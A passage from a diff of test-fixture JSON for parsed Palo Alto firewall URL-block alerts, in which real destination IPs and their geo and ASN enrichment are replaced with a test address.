"192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -9910,7 +9984,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:4MqfykfAOpIQmtvXcxzLNXqgyTs=" + "community_id": "1:XPW2Xo57vMe/e1J/4jEkCUgsq/A=" } }, "threat_category": "unknown", @@ -9955,8 +10029,8 @@ ], "network": { "community_id": [ - "1:S99EiT3uXg1VHeNM5TVPoeW1Zrk=", - "1:4MqfykfAOpIQmtvXcxzLNXqgyTs=" + "1:8SLZuF/iGteQ/lA8onZg6KSd/bA=", + "1:XPW2Xo57vMe/e1J/4jEkCUgsq/A=" ], "transport": "tcp", "application": "ssl", @@ -9995,14 +10069,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768284113Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691982300Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10025,26 +10099,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10060,14 +10136,14 @@ "port": 53134, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10082,7 +10158,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:Qj+AYB26PhFUPHkeHTP+u0XmR3A=" + "community_id": "1:6z9BQ8bWee+7czlaKdC6EcLBMxk=" } }, "threat_category": "unknown", @@ -10127,8 +10203,8 @@ ], "network": { "community_id": [ - "1:IMZ08eMrtDP/qCq8+cruyYo5r98=", - "1:Qj+AYB26PhFUPHkeHTP+u0XmR3A=" + "1:+L6RwsYCoS6WiJNcFn7uYMI0XMA=", + "1:6z9BQ8bWee+7czlaKdC6EcLBMxk=" ], "transport": "tcp", "application": "ssl", @@ -10167,14 +10243,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768292735Z", - "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691988700Z", + "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10197,26 +10273,28 @@ "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 16625, + "number": 4837, "organization": { - "name": "Akamai Technologies, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10232,14 +10310,14 @@ "port": 53135, "ip": "192.168.15.224" }, - "message": "192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "23.72.145.245" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10254,7 +10332,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:BQw3RXiNvT4NW4kw0J5Ol6rFN5A=" + "community_id": "1:oEzch01PssG3seKhubEA7CAefoI=" } }, "threat_category": "unknown", @@ -10299,8 +10377,8 @@ ], "network": { "community_id": [ - "1:Z6zBvBoA+0NQryjJ96nYaFcOuXw=", - "1:BQw3RXiNvT4NW4kw0J5Ol6rFN5A=" + "1:aA3Vr2qaw272iGwjQjO4RelJqxE=", + "1:oEzch01PssG3seKhubEA7CAefoI=" ], "transport": "tcp", "application": "ssl", @@ -10339,14 +10417,14 @@ ], "ip": [ "192.168.15.224", - "23.72.145.245", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768296877Z", - "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691995100Z", + "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10369,29 +10447,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10407,14 +10484,14 @@ "port": 53152, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10429,7 +10506,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:1XJhGS1EujYy5wSCA64wjjK7hwA=" + "community_id": "1:Xt3TJIRe2gqqzQimJKnaiilDMSA=" } }, "threat_category": "unknown", @@ -10474,8 +10551,8 @@ ], "network": { "community_id": [ - "1:Qo8vSWzvn9QN5ADlmHxjJft+bxA=", - "1:1XJhGS1EujYy5wSCA64wjjK7hwA=" + "1:mOAl+VIdWqJOivBzVNLNd2Tkzp0=", + "1:Xt3TJIRe2gqqzQimJKnaiilDMSA=" ], "transport": "tcp", "application": "ssl", @@ -10514,14 +10591,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768300769Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692001400Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10544,29 +10621,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10582,14 +10658,14 @@ "port": 53155, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10604,7 +10680,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:YHN6cU700Mp7622M1rIzbnPQ+ik=" + "community_id": "1:VWs4UWKf8SSAgZ2vTlmEYUnzm8A=" } }, "threat_category": "unknown", @@ -10649,8 +10725,8 @@ ], "network": { "community_id": [ - "1:N2DPhwTnklulMwYKpcc4j0nLwu4=", - "1:YHN6cU700Mp7622M1rIzbnPQ+ik=" + "1:FBAOxCzzN5pXB6JXA6nVqQ5nY80=", + "1:VWs4UWKf8SSAgZ2vTlmEYUnzm8A=" ], "transport": "tcp", "application": "ssl", @@ -10689,14 +10765,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768304740Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692007700Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10719,29 +10795,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10757,14 +10832,14 @@ "port": 53158, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10779,7 +10854,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:o5UB5uvp2ThXPXChyc7lgvBMH0s=" + "community_id": "1:gZ12MVLkixlhUZ9zshgzzRzyV5U=" } }, "threat_category": "unknown", @@ -10824,8 +10899,8 @@ ], "network": { "community_id": [ - "1:j5m21kfahBuP4jLMiqVnsVTJZ+Q=", - "1:o5UB5uvp2ThXPXChyc7lgvBMH0s=" + "1:rRimmkY7Rf+bKXyyb/f9P5qVs4A=", + "1:gZ12MVLkixlhUZ9zshgzzRzyV5U=" ], "transport": "tcp", "application": "ssl", @@ -10864,14 +10939,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768371103Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692014Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -10894,29 +10969,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -10932,14 +11006,14 @@ "port": 53160, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -10954,7 +11028,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:RRfOKybSMc/qYj1QHLEpuh+r0Eg=" + "community_id": "1:yHmBEbzUrk+NT5+GUmqZ3AXUfKw=" } }, "threat_category": "unknown", @@ -10999,8 +11073,8 @@ ], "network": { "community_id": [ - "1:8jQcqVCl+Q8N6jDNJlJwuydmDsA=", - "1:RRfOKybSMc/qYj1QHLEpuh+r0Eg=" + "1:R87H/PodbzRBbjjT4VDhkHd+2X4=", + "1:yHmBEbzUrk+NT5+GUmqZ3AXUfKw=" ], "transport": "tcp", "application": "ssl", @@ -11039,14 +11113,14 @@ ], "ip": [ "192.168.15.224", - "54.209.101.70", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768380635Z", - "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.692020400Z", + "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:26.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -11069,29 +11143,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.209.101.70" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - 